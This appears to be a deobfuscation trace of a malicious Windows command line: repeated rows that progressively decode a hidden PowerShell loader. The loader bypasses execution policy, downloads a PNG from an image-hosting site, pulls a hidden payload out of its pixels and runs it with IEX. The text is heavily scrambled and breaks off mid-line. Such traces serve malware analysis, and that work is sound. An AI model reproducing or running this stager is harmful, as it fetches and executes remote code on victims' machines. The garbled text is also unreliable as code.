eqf6NV:s3L]V).f6aL3e ) ^^^|tyO4ERsheiVElL -noqf6Niqf6NTE]aCTI -qf6NolO -4iqf6N TFIdden -e7ecuTIOqf6NpOLIc 3k9`tyAjhjh -nOty]OFIle -COmBkAqf6Nd ^^^^^^^&1 @eqf6NV:Comstyec{H,2H,25Oy-JoIn'')1@inpuT ) ^&^& cmd.e7E cgc %adi/Y% |
|
1 | |
| Get Environment String | name = .*#, result_out = set suL]f6aK. 1 @sheiVelLId{DnOy+@sTFELlId{Dn#Oy+'X') 11's'+'al f'+']'+' qf6N'+'e4-O3k9heiec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'ing9a7['+'f66pBBkds'+'aKf] jh`ste'+'m.'+'D]a4in'+'g.B'+'itmap11f] qf6Net.W'+'e3k9C'+'lient).'+'OpenRead19a'+'7'+'TFttps:cgcgimag'+'es2.img3k9o'+'7.co'+'mcg90cgfDncg'+'gat2BkVsK_o.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Oy '+'2DnH0[10.'+'.H)3k9'+'jh'+'hei%\fo]eacTF1'+'f6'+'6'+'pBBk7 in10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyi7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_*H28+f66pBBk7OyaK1{matTFOy::F'+'lo'+'o]11f66'+'pBBktt.B-3k9andDn5)*Dn6)-3k9o]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{jh`st'+'em.Te7'+'t.E'+'ncodin'+'g'+'Oy::AjhCII.'+'aEetjh'+'t]ing1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Oy)'+')').ReplaCE1'9a7',{sTRInaEOy{CTFA]Oy#H).ReplaCE11{CTFA]Oy98+{CTFA]Oy8#+{CTFA]OyDn06),{sTRInaEOy{CTFA]OyDn2H).ReplaCE11{CTFA]OyDnDn8+{CTFA]Oy5H+{CTFA]Oy8Dn),{sTRInaEOy{CTFA]Oy#6))^&^& seT aDIz`aKEcTFO 1gi f6aRIA3k9le:e*Xt).VaLuE.Inf6OkEComBkanD.Iqf6NVOkesCRityT11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^|tyO4ERsheiVElL -noqf6Niqf6NTE]aCTI -qf6NolO -4iqf6N TFIdden -e7ecuTIOqf6NpOLIc 3k9`tyAjhjh -nOty]OFIle -COmBkAqf6Nd ^^^^^^^&1 @eqf6NV:Comstyec{H,2H,25Oy-JoIn'')1@inpuT ) ^&^& cmd.e7E cgc %adizY% |
|
1 | |
| Get Environment String | name = @;?#, result_out = set suL]f6aK. 1 @sheiVelLId{DnOy+@sTFELlId{Dn#Oy+'X') 11's'+'al f'+']'+' qf6N'+'e4-O3k9heiec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'ing9a7['+'f66pBBkds'+'aKf] jh`ste'+'m.'+'D]a4in'+'g.B'+'itmap11f] qf6Net.W'+'e3k9C'+'lient).'+'OpenRead19a'+'7'+'TFttps://imag'+'es2.img3k9o'+'7.co'+'m/90/fDn/'+'gat2BkVsK_o.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Oy '+'2DnH0[10.'+'.H)3k9'+'jh'+'hei%\fo]eacTF1'+'f6'+'6'+'pBBk7 in10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyi7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_*H28+f66pBBk7OyaK1{matTFOy::F'+'lo'+'o]11f66'+'pBBktt.B-3k9andDn5)*Dn6)-3k9o]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{jh`st'+'em.Te7'+'t.E'+'ncodin'+'g'+'Oy::AjhCII.'+'aEetjh'+'t]ing1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Oy)'+')').ReplaCE1'9a7',{sTRInaEOy{CTFA]Oy#H).ReplaCE11{CTFA]Oy98+{CTFA]Oy8#+{CTFA]OyDn06),{sTRInaEOy{CTFA]OyDn2H).ReplaCE11{CTFA]OyDnDn8+{CTFA]Oy5H+{CTFA]Oy8Dn),{sTRInaEOy{CTFA]Oy#6))^&^& seT aDIz`aKEcTFO 1gi f6aRIA3k9le:e*Xt).VaLuE.Inf6OkEComBkanD.Iqf6NVOkesCRityT11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^|tyO4ERsheiVElL -noqf6Niqf6NTE]aCTI -qf6NolO -4iqf6N TFIdden -e7ecuTIOqf6NpOLIc 3k9`tyAjhjh -nOty]OFIle -COmBkAqf6Nd ^^^^^^^&1 @eqf6NV:Comstyec{H,2H,25Oy-JoIn'')1@inpuT ) ^&^& cmd.e7E /c %adizY% |
|
1 | |
| Get Environment String | name = ,@$[, result_out = set suL]f6aK. 1 @sheiVelLId{DnOy+@sTFELlId{Dn#Oy+'X') 11's'+'al f'+']'+' qf6N'+'e4-O3k9heiec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7S`stem.D]a'+'4'+'ing9a7['+'f66pBBkds'+'aKf] S`ste'+'m.'+'D]a4in'+'g.B'+'itmap11f] qf6Net.W'+'e3k9C'+'lient).'+'OpenRead19a'+'7'+'TFttps://imag'+'es2.img3k9o'+'7.co'+'m/90/fDn/'+'gat2BkVsK_o.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Oy '+'2DnH0[10.'+'.H)3k9'+'S'+'hei%\fo]eacTF1'+'f6'+'6'+'pBBk7 in10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyi7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_*H28+f66pBBk7OyaK1{matTFOy::F'+'lo'+'o]11f66'+'pBBktt.B-3k9andDn5)*Dn6)-3k9o]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Te7'+'t.E'+'ncodin'+'g'+'Oy::ASCII.'+'aEetS'+'t]ing1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Oy)'+')').ReplaCE1'9a7',{sTRInaEOy{CTFA]Oy#H).ReplaCE11{CTFA]Oy98+{CTFA]Oy8#+{CTFA]OyDn06),{sTRInaEOy{CTFA]OyDn2H).ReplaCE11{CTFA]OyDnDn8+{CTFA]Oy5H+{CTFA]Oy8Dn),{sTRInaEOy{CTFA]Oy#6))^&^& seT aDIz`aKEcTFO 1gi f6aRIA3k9le:e*Xt).VaLuE.Inf6OkEComBkanD.Iqf6NVOkesCRityT11LS eqf6NV:s3L]V).f6aL3e ) ^^^|tyO4ERsheiVElL -noqf6Niqf6NTE]aCTI -qf6NolO -4iqf6N TFIdden -e7ecuTIOqf6NpOLIc 3k9`tyASS -nOty]OFIle -COmBkAqf6Nd ^^^^^^^&1 @eqf6NV:Comstyec{H,2H,25Oy-JoIn'')1@inpuT ) ^&^& cmd.e7E /c %adizY% |
|
1 | |
| Get Environment String | name = {$_, result_out = set suL]f6aK. 1 @sheiVelLId{DnOy+@sTFELlId{Dn#Oy+'X') 11's'+'al f'+']'+' qf6N'+'e4-O3k9heiec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7S`stem.D]a'+'4'+'ing9a7['+'f66pBMds'+'aKf] S`ste'+'m.'+'D]a4in'+'g.B'+'itmap11f] qf6Net.W'+'e3k9C'+'lient).'+'OpenRead19a'+'7'+'TFttps://imag'+'es2.img3k9o'+'7.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9a7'+'))['+'f66pBM'+'mkaKf] B`'+'t'+'e{Oy '+'2DnH0[10.'+'.H)3k9'+'S'+'hei%\fo]eacTF1'+'f6'+'6'+'pBM7 in10..H'+'2('+'))\f66pBM'+'t'+'taKf66pBMds.aEe'+'ttyi7el1f66pBM7,'+'f6'+'6pBM_'+')[f66pBMmk'+'{f66pBM'+'_*H28+f66pBM7OyaK1{matTFOy::F'+'lo'+'o]11f66'+'pBMtt.B-3k9andDn5)*Dn6)-3k9o]'+'1f66pBMt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Te7'+'t.E'+'ncodin'+'g'+'Oy::ASCII.'+'aEetS'+'t]ing1f66'+'pBM'+'mk{0.'+'.'+'Dn'+'90('+'Oy)'+')').ReplaCE1'9a7',{sTRInaEOy{CTFA]Oy#H).ReplaCE11{CTFA]Oy98+{CTFA]Oy8#+{CTFA]OyDn06),{sTRInaEOy{CTFA]OyDn2H).ReplaCE11{CTFA]OyDnDn8+{CTFA]Oy5H+{CTFA]Oy8Dn),{sTRInaEOy{CTFA]Oy#6))^&^& seT aDIz`aKEcTFO 1gi f6aRIA3k9le:e*Xt).VaLuE.Inf6OkEComManD.Iqf6NVOkesCRityT11LS eqf6NV:s3L]V).f6aL3e ) ^^^|tyO4ERsheiVElL -noqf6Niqf6NTE]aCTI -qf6NolO -4iqf6N TFIdden -e7ecuTIOqf6NpOLIc 3k9`tyASS -nOty]OFIle -COmMAqf6Nd ^^^^^^^&1 @eqf6NV:Comstyec{H,2H,25Oy-JoIn'')1@inpuT ) ^&^& cmd.e7E /c %adizY% |
|
1 | |
| Get Environment String | name = '`#, result_out = set suL]vaK. 1 @sheiVelLId{DnOy+@sTFELlId{Dn#Oy+'X') 11's'+'al f'+']'+' qvN'+'e4-O3k9heiec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qvName 9a7S`stem.D]a'+'4'+'ing9a7['+'v6pBMds'+'aKf] S`ste'+'m.'+'D]a4in'+'g.B'+'itmap11f] qvNet.W'+'e3k9C'+'lient).'+'OpenRead19a'+'7'+'TFttps://imag'+'es2.img3k9o'+'7.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9a7'+'))['+'v6pBM'+'mkaKf] B`'+'t'+'e{Oy '+'2DnH0[10.'+'.H)3k9'+'S'+'hei%\fo]eacTF1'+'v'+'6'+'pBM7 in10..H'+'2('+'))\v6pBM'+'t'+'taKv6pBMds.aEe'+'ttyi7el1v6pBM7,'+'v'+'6pBM_'+')[v6pBMmk'+'{v6pBM'+'_*H28+v6pBM7OyaK1{matTFOy::F'+'lo'+'o]11v6'+'pBMtt.B-3k9andDn5)*Dn6)-3k9o]'+'1v6pBMt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Te7'+'t.E'+'ncodin'+'g'+'Oy::ASCII.'+'aEetS'+'t]ing1v6'+'pBM'+'mk{0.'+'.'+'Dn'+'90('+'Oy)'+')').ReplaCE1'9a7',{sTRInaEOy{CTFA]Oy#H).ReplaCE11{CTFA]Oy98+{CTFA]Oy8#+{CTFA]OyDn06),{sTRInaEOy{CTFA]OyDn2H).ReplaCE11{CTFA]OyDnDn8+{CTFA]Oy5H+{CTFA]Oy8Dn),{sTRInaEOy{CTFA]Oy#6))^&^& seT aDIz`aKEcTFO 1gi vaRIA3k9le:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT11LS eqvNV:s3L]V).vaL3e ) ^^^|tyO4ERsheiVElL -noqvNiqvNTE]aCTI -qvNolO -4iqvN TFIdden -e7ecuTIOqvNpOLIc 3k9`tyASS -nOty]OFIle -COmMAqvNd ^^^^^^^&1 @eqvNV:Comstyec{H,2H,25Oy-JoIn'')1@inpuT ) ^&^& cmd.e7E /c %adizY% |
|
1 | |
| Get Environment String | name = }\?, result_out = set suLrvaK. 1 @sheiVelLId{DnOy+@sTFELlId{Dn#Oy+'X') 11's'+'al f'+'r'+' qvN'+'e4-O3k9heiec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qvName 9a7S`stem.Dra'+'4'+'ing9a7['+'v6pBMds'+'aKfr S`ste'+'m.'+'Dra4in'+'g.B'+'itmap11fr qvNet.W'+'e3k9C'+'lient).'+'OpenRead19a'+'7'+'TFttps://imag'+'es2.img3k9o'+'7.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9a7'+'))['+'v6pBM'+'mkaKfr B`'+'t'+'e{Oy '+'2DnH0[10.'+'.H)3k9'+'S'+'hei%\foreacTF1'+'v'+'6'+'pBM7 in10..H'+'2('+'))\v6pBM'+'t'+'taKv6pBMds.aEe'+'ttyi7el1v6pBM7,'+'v'+'6pBM_'+')[v6pBMmk'+'{v6pBM'+'_*H28+v6pBM7OyaK1{matTFOy::F'+'lo'+'or11v6'+'pBMtt.B-3k9andDn5)*Dn6)-3k9or'+'1v6pBMt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Te7'+'t.E'+'ncodin'+'g'+'Oy::ASCII.'+'aEetS'+'tring1v6'+'pBM'+'mk{0.'+'.'+'Dn'+'90('+'Oy)'+')').ReplaCE1'9a7',{sTRInaEOy{CTFArOy#H).ReplaCE11{CTFArOy98+{CTFArOy8#+{CTFArOyDn06),{sTRInaEOy{CTFArOyDn2H).ReplaCE11{CTFArOyDnDn8+{CTFArOy5H+{CTFArOy8Dn),{sTRInaEOy{CTFArOy#6))^&^& seT aDIz`aKEcTFO 1gi vaRIA3k9le:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT11LS eqvNV:s3LrV).vaL3e ) ^^^|tyO4ERsheiVElL -noqvNiqvNTEraCTI -qvNolO -4iqvN TFIdden -e7ecuTIOqvNpOLIc 3k9`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&1 @eqvNV:Comstyec{H,2H,25Oy-JoIn'')1@inpuT ) ^&^& cmd.e7E /c %adizY% |
|
1 | |
| Get Environment String | name = {;, result_out = set suLrvaK. 1 @sheiVelLId{DnOy+@sTFELlId{Dn#Oy+'X') 11's'+'al f'+'r'+' qvN'+'e4-O3k9heiec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qvName 9axS`stem.Dra'+'4'+'ing9ax['+'v6pBMds'+'aKfr S`ste'+'m.'+'Dra4in'+'g.B'+'itmap11fr qvNet.W'+'e3k9C'+'lient).'+'OpenRead19a'+'x'+'TFttps://imag'+'es2.img3k9o'+'x.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6pBM'+'mkaKfr B`'+'t'+'e{Oy '+'2DnH0[10.'+'.H)3k9'+'S'+'hei%\foreacTF1'+'v'+'6'+'pBMx in10..H'+'2('+'))\v6pBM'+'t'+'taKv6pBMds.aEe'+'ttyixel1v6pBMx,'+'v'+'6pBM_'+')[v6pBMmk'+'{v6pBM'+'_*H28+v6pBMxOyaK1{matTFOy::F'+'lo'+'or11v6'+'pBMtt.B-3k9andDn5)*Dn6)-3k9or'+'1v6pBMt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+'Oy::ASCII.'+'aEetS'+'tring1v6'+'pBM'+'mk{0.'+'.'+'Dn'+'90('+'Oy)'+')').ReplaCE1'9ax',{sTRInaEOy{CTFArOy#H).ReplaCE11{CTFArOy98+{CTFArOy8#+{CTFArOyDn06),{sTRInaEOy{CTFArOyDn2H).ReplaCE11{CTFArOyDnDn8+{CTFArOy5H+{CTFArOy8Dn),{sTRInaEOy{CTFArOy#6))^&^& seT aDIz`aKEcTFO 1gi vaRIA3k9le:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT11LS eqvNV:s3LrV).vaL3e ) ^^^|tyO4ERsheiVElL -noqvNiqvNTEraCTI -qvNolO -4iqvN TFIdden -execuTIOqvNpOLIc 3k9`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&1 @eqvNV:Comstyec{H,2H,25Oy-JoIn'')1@inpuT ) ^&^& cmd.exE /c %adizY% |
|
1 | |
| Get Environment String | name = `}$@, result_out = set suLrvaK. 1 @sheiVelLId{Dn]+@sTFELlId{Dn#]+'X') 11's'+'al f'+'r'+' qvN'+'e4-O3k9heiec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qvName 9axS`stem.Dra'+'4'+'ing9ax['+'v6pBMds'+'aKfr S`ste'+'m.'+'Dra4in'+'g.B'+'itmap11fr qvNet.W'+'e3k9C'+'lient).'+'OpenRead19a'+'x'+'TFttps://imag'+'es2.img3k9o'+'x.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6pBM'+'mkaKfr B`'+'t'+'e{] '+'2DnH0[10.'+'.H)3k9'+'S'+'hei%\foreacTF1'+'v'+'6'+'pBMx in10..H'+'2('+'))\v6pBM'+'t'+'taKv6pBMds.aEe'+'ttyixel1v6pBMx,'+'v'+'6pBM_'+')[v6pBMmk'+'{v6pBM'+'_*H28+v6pBMx]aK1{matTF]::F'+'lo'+'or11v6'+'pBMtt.B-3k9andDn5)*Dn6)-3k9or'+'1v6pBMt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'aEetS'+'tring1v6'+'pBM'+'mk{0.'+'.'+'Dn'+'90('+'])'+')').ReplaCE1'9ax',{sTRInaE]{CTFAr]#H).ReplaCE11{CTFAr]98+{CTFAr]8#+{CTFAr]Dn06),{sTRInaE]{CTFAr]Dn2H).ReplaCE11{CTFAr]DnDn8+{CTFAr]5H+{CTFAr]8Dn),{sTRInaE]{CTFAr]#6))^&^& seT aDIz`aKEcTFO 1gi vaRIA3k9le:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT11LS eqvNV:s3LrV).vaL3e ) ^^^|tyO4ERsheiVElL -noqvNiqvNTEraCTI -qvNolO -4iqvN TFIdden -execuTIOqvNpOLIc 3k9`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&1 @eqvNV:Comstyec{H,2H,25]-JoIn'')1@inpuT ) ^&^& cmd.exE /c %adizY% |
|
1 | |
| Get Environment String | name = ?$_, result_out = set suLrvaK. 1 @sheiVelLId{Dn]+@sTFELlId{Dn#]+'X') 11's'+'al f'+'r'+' qvN'+'e4-O3k9heiec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qvName 9axS`stem.Dra'+'4'+'ing9ax['+'v6Qds'+'aKfr S`ste'+'m.'+'Dra4in'+'g.B'+'itmap11fr qvNet.W'+'e3k9C'+'lient).'+'OpenRead19a'+'x'+'TFttps://imag'+'es2.img3k9o'+'x.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mkaKfr B`'+'t'+'e{] '+'2DnH0[10.'+'.H)3k9'+'S'+'hei%\foreacTF1'+'v'+'6'+'Qx in10..H'+'2('+'))\v6Q'+'t'+'taKv6Qds.aEe'+'ttyixel1v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_*H28+v6Qx]aK1{matTF]::F'+'lo'+'or11v6'+'Qtt.B-3k9andDn5)*Dn6)-3k9or'+'1v6Qt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'aEetS'+'tring1v6'+'Q'+'mk{0.'+'.'+'Dn'+'90('+'])'+')').ReplaCE1'9ax',{sTRInaE]{CTFAr]#H).ReplaCE11{CTFAr]98+{CTFAr]8#+{CTFAr]Dn06),{sTRInaE]{CTFAr]Dn2H).ReplaCE11{CTFAr]DnDn8+{CTFAr]5H+{CTFAr]8Dn),{sTRInaE]{CTFAr]#6))^&^& seT aDIz`aKEcTFO 1gi vaRIA3k9le:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT11LS eqvNV:s3LrV).vaL3e ) ^^^|tyO4ERsheiVElL -noqvNiqvNTEraCTI -qvNolO -4iqvN TFIdden -execuTIOqvNpOLIc 3k9`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&1 @eqvNV:Comstyec{H,2H,25]-JoIn'')1@inpuT ) ^&^& cmd.exE /c %adizY% |
|
1 | |
| Get Environment String | name = ;.+, result_out = set suLrvaK. 1 @sheiVelLId{Dn]+@sTFELlId{Dn#]+'X') 11's'+'al f'+'r'+' qvN'+'e4-O3k9heiec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qvName 9axS`stem.Dra'+'4'+'ing9ax['+'v6Qds'+'aKfr S`ste'+'m.'+'Dra4in'+'g.B'+'itmap11fr qvNet.W'+'e3k9C'+'lient).'+'OpenRead19a'+'x'+'TFttps://imag'+'es2.img3k9o'+'x.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mkaKfr B`'+'t'+'e{] '+'2DnH0[10.'+'.H)3k9'+'S'+'hei%\foreacTF1'+'v'+'6'+'Qx in10..H'+'27'+'))\v6Q'+'t'+'taKv6Qds.aEe'+'ttyixel1v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_*H28+v6Qx]aK1{matTF]::F'+'lo'+'or11v6'+'Qtt.B-3k9andDn5)*Dn6)-3k9or'+'1v6Qt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'aEetS'+'tring1v6'+'Q'+'mk{0.'+'.'+'Dn'+'907'+'])'+')').ReplaCE1'9ax',{sTRInaE]{CTFAr]#H).ReplaCE11{CTFAr]98+{CTFAr]8#+{CTFAr]Dn06),{sTRInaE]{CTFAr]Dn2H).ReplaCE11{CTFAr]DnDn8+{CTFAr]5H+{CTFAr]8Dn),{sTRInaE]{CTFAr]#6))^&^& seT aDIz`aKEcTFO 1gi vaRIA3k9le:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT11LS eqvNV:s3LrV).vaL3e ) ^^^|tyO4ERsheiVElL -noqvNiqvNTEraCTI -qvNolO -4iqvN TFIdden -execuTIOqvNpOLIc 3k9`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&1 @eqvNV:Comstyec{H,2H,25]-JoIn'')1@inpuT ) ^&^& cmd.exE /c %adizY% |
|
1 | |
| Get Environment String | name = -}, result_out = set suLrv=. 1 @sheiVelLId{Dn]+@sTFELlId{Dn#]+'X') 11's'+'al f'+'r'+' qvN'+'e4-O3k9heiec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qvName 9axS`stem.Dra'+'4'+'ing9ax['+'v6Qds'+'=fr S`ste'+'m.'+'Dra4in'+'g.B'+'itmap11fr qvNet.W'+'e3k9C'+'lient).'+'OpenRead19a'+'x'+'TFttps://imag'+'es2.img3k9o'+'x.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mk=fr B`'+'t'+'e{] '+'2DnH0[10.'+'.H)3k9'+'S'+'hei%\foreacTF1'+'v'+'6'+'Qx in10..H'+'27'+'))\v6Q'+'t'+'t=v6Qds.aEe'+'ttyixel1v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_*H28+v6Qx]=1{matTF]::F'+'lo'+'or11v6'+'Qtt.B-3k9andDn5)*Dn6)-3k9or'+'1v6Qt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'aEetS'+'tring1v6'+'Q'+'mk{0.'+'.'+'Dn'+'907'+'])'+')').ReplaCE1'9ax',{sTRInaE]{CTFAr]#H).ReplaCE11{CTFAr]98+{CTFAr]8#+{CTFAr]Dn06),{sTRInaE]{CTFAr]Dn2H).ReplaCE11{CTFAr]DnDn8+{CTFAr]5H+{CTFAr]8Dn),{sTRInaE]{CTFAr]#6))^&^& seT aDIz`=EcTFO 1gi vaRIA3k9le:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT11LS eqvNV:s3LrV).vaL3e ) ^^^|tyO4ERsheiVElL -noqvNiqvNTEraCTI -qvNolO -4iqvN TFIdden -execuTIOqvNpOLIc 3k9`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&1 @eqvNV:Comstyec{H,2H,25]-JoIn'')1@inpuT ) ^&^& cmd.exE /c %adizY% |
|
1 | |
| Get Environment String | name = .;?, result_out = set suLrv=. 1 @sjVelLId{Dn]+@sTFELlId{Dn#]+'X') 11's'+'al f'+'r'+' qvN'+'e4-O3k9jec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qvName 9axS`stem.Dra'+'4'+'ing9ax['+'v6Qds'+'=fr S`ste'+'m.'+'Dra4in'+'g.B'+'itmap11fr qvNet.W'+'e3k9C'+'lient).'+'OpenRead19a'+'x'+'TFttps://imag'+'es2.img3k9o'+'x.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mk=fr B`'+'t'+'e{] '+'2DnH0[10.'+'.H)3k9'+'S'+'j%\foreacTF1'+'v'+'6'+'Qx in10..H'+'27'+'))\v6Q'+'t'+'t=v6Qds.aEe'+'ttyixel1v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_*H28+v6Qx]=1{matTF]::F'+'lo'+'or11v6'+'Qtt.B-3k9andDn5)*Dn6)-3k9or'+'1v6Qt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'aEetS'+'tring1v6'+'Q'+'mk{0.'+'.'+'Dn'+'907'+'])'+')').ReplaCE1'9ax',{sTRInaE]{CTFAr]#H).ReplaCE11{CTFAr]98+{CTFAr]8#+{CTFAr]Dn06),{sTRInaE]{CTFAr]Dn2H).ReplaCE11{CTFAr]DnDn8+{CTFAr]5H+{CTFAr]8Dn),{sTRInaE]{CTFAr]#6))^&^& seT aDIz`=EcTFO 1gi vaRIA3k9le:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT11LS eqvNV:s3LrV).vaL3e ) ^^^|tyO4ERsjVElL -noqvNiqvNTEraCTI -qvNolO -4iqvN TFIdden -execuTIOqvNpOLIc 3k9`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&1 @eqvNV:Comstyec{H,2H,25]-JoIn'')1@inpuT ) ^&^& cmd.exE /c %adizY% |
|
1 | |
| Get Environment String | name = +.@#, result_out = set suLrv=. 1 @sjVelLId{Dn]+@sTFELlId{Dn#]+'X') 11's'+'al f'+'r'+' qvN'+'e4-Objec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sembl`'+'qvName 9axS`stem.Dra'+'4'+'ing9ax['+'v6Qds'+'=fr S`ste'+'m.'+'Dra4in'+'g.B'+'itmap11fr qvNet.W'+'ebC'+'lient).'+'OpenRead19a'+'x'+'TFttps://imag'+'es2.imgbo'+'x.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mk=fr B`'+'t'+'e{] '+'2DnH0[10.'+'.H)b'+'S'+'j%\foreacTF1'+'v'+'6'+'Qx in10..H'+'27'+'))\v6Q'+'t'+'t=v6Qds.aEe'+'ttyixel1v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_*H28+v6Qx]=1{matTF]::F'+'lo'+'or11v6'+'Qtt.B-bandDn5)*Dn6)-bor'+'1v6Qt'+'t.aE -band Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'aEetS'+'tring1v6'+'Q'+'mk{0.'+'.'+'Dn'+'907'+'])'+')').ReplaCE1'9ax',{sTRInaE]{CTFAr]#H).ReplaCE11{CTFAr]98+{CTFAr]8#+{CTFAr]Dn06),{sTRInaE]{CTFAr]Dn2H).ReplaCE11{CTFAr]DnDn8+{CTFAr]5H+{CTFAr]8Dn),{sTRInaE]{CTFAr]#6))^&^& seT aDIz`=EcTFO 1gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT11LS eqvNV:s3LrV).vaL3e ) ^^^|tyO4ERsjVElL -noqvNiqvNTEraCTI -qvNolO -4iqvN TFIdden -execuTIOqvNpOLIc b`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&1 @eqvNV:Comstyec{H,2H,25]-JoIn'')1@inpuT ) ^&^& cmd.exE /c %adizY% |
|
1 | |
| Get Environment String | name = {'`#, result_out = set suLrv=. 1 @sjVelLId{Dn]+@sTFELlId{Dn#]+'X') 11's'+'al f'+'r'+' qvN'+'ew-Objec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sembl`'+'qvName 9axS`stem.Dra'+'w'+'ing9ax['+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap11fr qvNet.W'+'ebC'+'lient).'+'OpenRead19a'+'x'+'TFttps://imag'+'es2.imgbo'+'x.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mk=fr B`'+'t'+'e{] '+'2DnH0[10.'+'.H)b'+'S'+'j%\foreacTF1'+'v'+'6'+'Qx in10..H'+'27'+'))\v6Q'+'t'+'t=v6Qds.aEe'+'ttyixel1v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_*H28+v6Qx]=1{matTF]::F'+'lo'+'or11v6'+'Qtt.B-bandDn5)*Dn6)-bor'+'1v6Qt'+'t.aE -band 